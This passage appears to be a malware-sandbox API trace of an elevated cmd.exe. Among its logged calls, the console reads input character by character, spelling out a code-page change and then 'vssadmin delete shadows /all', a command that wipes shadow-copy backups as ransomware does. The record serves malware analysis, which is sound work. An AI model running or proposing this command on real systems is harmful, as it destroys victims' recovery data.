lpBaseAddress=0x7fffffd6000, lpBuffer=0x31eb40, nSize=0x380, lpNumberOfBytesRead=0x31eb00 | out: lpBuffer=0x31eb40*, lpNumberOfBytesRead=0x31eb00*=0x380) returned 1 [0033.417] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0033.681] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x31f148 | out: lpExitCode=0x31f148*=0x0) returned 1 [0033.681] CloseHandle (hObject=0x54) returned 1 [0033.681] _vsnwprintf (in: _Buffer=0x31f3b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x31f158 | out: _Buffer="00000000") returned 8 [0033.682] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0033.682] GetProcessHeap () returned 0xc0000 [0033.682] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdb500 | out: hHeap=0xc0000) returned 1 [0033.682] GetEnvironmentStringsW () returned 0xdaa10* [0033.682] GetProcessHeap () returned 0xc0000 [0033.682] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xb0e) returned 0xdeb10 [0033.682] FreeEnvironmentStringsW (penv=0xdaa10) returned 1 [0033.682] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0033.682] GetProcessHeap () returned 0xc0000 [0033.682] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdeb10 | out: hHeap=0xc0000) returned 1 [0033.682] GetEnvironmentStringsW () returned 0xdaa10* [0033.682] GetProcessHeap () returned 0xc0000 [0033.682] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xb0e) returned 0xdeb10 [0033.682] FreeEnvironmentStringsW (penv=0xdaa10) returned 1 [0033.682] GetProcessHeap () returned 0xc0000 [0033.682] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd8900 | out: hHeap=0xc0000) returned 1 [0033.682] DeleteProcThreadAttributeList (in: lpAttributeList=0x31f218 | out: lpAttributeList=0x31f218) [0033.683] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0033.684] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.684] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0033.684] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.684] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a44e194 | out: lpMode=0x4a44e194) returned 0 [0033.684] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.684] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a44e198 | out: lpMode=0x4a44e198) returned 0 [0033.684] GetConsoleOutputCP () returned 0x4e3 [0033.684] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a45bfe0 | out: lpCPInfo=0x4a45bfe0) returned 1 [0033.685] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0033.685] GetProcessHeap () returned 0xc0000 [0033.685] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd5b70 | out: hHeap=0xc0000) returned 1 [0033.685] GetProcessHeap () returned 0xc0000 [0033.685] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd9b00 | out: hHeap=0xc0000) returned 1 [0033.685] GetProcessHeap () returned 0xc0000 [0033.686] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xc1cd0 | out: hHeap=0xc0000) returned 1 [0033.686] GetProcessHeap () returned 0xc0000 [0033.686] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd9a80 | out: hHeap=0xc0000) returned 1 [0033.686] GetProcessHeap () returned 0xc0000 [0033.686] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd98a0 | out: hHeap=0xc0000) returned 1 [0033.686] GetProcessHeap () returned 0xc0000 [0033.686] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xc1ab0 | out: hHeap=0xc0000) returned 1 [0033.686] GetProcessHeap () returned 0xc0000 [0033.686] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd6510 | out: hHeap=0xc0000) returned 1 [0033.686] GetProcessHeap () returned 0xc0000 [0033.686] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd4610 | out: hHeap=0xc0000) returned 1 [0033.686] GetProcessHeap () returned 0xc0000 [0033.686] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd97e0 | out: hHeap=0xc0000) returned 1 [0033.686] _vsnwprintf (in: _Buffer=0x4a466340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f678 | out: _Buffer="\r\n") returned 2 [0033.686] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.686] GetFileType (hFile=0xf4) returned 0x3 [0033.686] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.686] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a45c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0033.686] WriteFile (in: hFile=0xf4, lpBuffer=0x4a45c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f648, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesWritten=0x31f648*=0x2, lpOverlapped=0x0) returned 1 [0033.686] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0033.686] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a45c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0033.686] _vsnwprintf (in: _Buffer=0x4a44eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x31f688 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0033.686] _vsnwprintf (in: _Buffer=0x4a44ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x31f688 | out: _Buffer=">") returned 1 [0033.686] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.686] GetFileType (hFile=0xf4) returned 0x3 [0033.686] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.686] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a45c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0033.687] WriteFile (in: hFile=0xf4, lpBuffer=0x4a45c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x31f678, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesWritten=0x31f678*=0x26, lpOverlapped=0x0) returned 1 [0033.687] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.687] GetFileType (hFile=0xe8) returned 0x3 [0033.687] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.687] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.687] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.687] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0033.687] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.687] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.687] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.687] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0033.687] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.687] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.687] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.687] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0033.687] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.687] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.687] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.687] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0033.687] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.687] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.687] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.687] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0033.687] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.687] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.688] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.688] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0033.688] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.688] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.688] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.688] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0033.688] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.688] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.688] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.688] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0033.688] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.688] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.688] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.688] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0033.688] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.688] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.688] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.688] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0033.688] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.688] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.688] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.688] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0033.688] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.688] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.688] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.688] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0033.689] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.689] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.689] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.689] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0033.689] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.689] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.689] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.689] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0033.689] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.689] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.689] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.689] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0033.689] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.689] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.689] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.689] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0033.689] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.689] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.689] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.689] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0033.689] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.689] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.689] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.689] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0033.689] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.689] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.689] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.690] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0033.690] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.690] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.690] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.690] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0033.690] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.690] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.690] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.690] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0033.690] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.690] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.690] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.690] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0033.690] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.690] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.690] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.690] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0033.690] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.690] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.690] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.690] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0033.690] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.690] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.690] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.690] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0033.690] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.691] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.691] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0033.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.691] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.691] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0033.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.691] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.691] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0033.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.691] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.691] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, 